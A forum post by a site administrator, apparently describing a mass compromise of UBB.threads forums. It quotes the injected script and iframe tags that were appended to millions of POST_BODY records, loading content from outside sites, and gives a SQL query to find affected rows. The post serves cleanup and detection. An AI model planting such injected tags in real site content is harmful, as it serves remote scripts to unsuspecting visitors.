Well, two of the sites I have worked on, every post in the database was modified, several million, adding this to the end of the POST_BODY field:
<script src=http://snipershide.com/wp-content/texashunting.js></script><br /><script src=http://snipershide.com/wp-content/texashunting.js></script><script src=http://snipershide.com/wp-content/texashunting.js></script><br /><iframe src=http://forums.weddingbells.ca/tmp/index.html width=750 height=110></iframe>
It's a somewhat easy cleanup with a mysql replace, but it takes quite awhile. Anyone with this issue, I'd look at your ubbt_POSTS table, specifically at the POST_BODY field. It won't show up when editing the post, because the POST_DEFAULT_BODY field isn't altered, so you'll need to use some type of mysql tool.
Quick way to check would be to run the following SQL:
select count(*) from ubbt_POSTS where POST_BODY LIKE '%<iframe%' or POST_BODY LIKE '%<script%'
We scrubbed Sniper's Hide and now we are just dealing with what is on left on the two other sites,
The hackers left several pieces of code and back doors in, but my biggest issues is the dump that pulls from these two other sites putting a huge load on our forum.
We have the latest software installed, the patches and all, but still we can't control what was inserted into other sites.
if anyone knows these two sites have them scrub there pages as it is still pulling from there.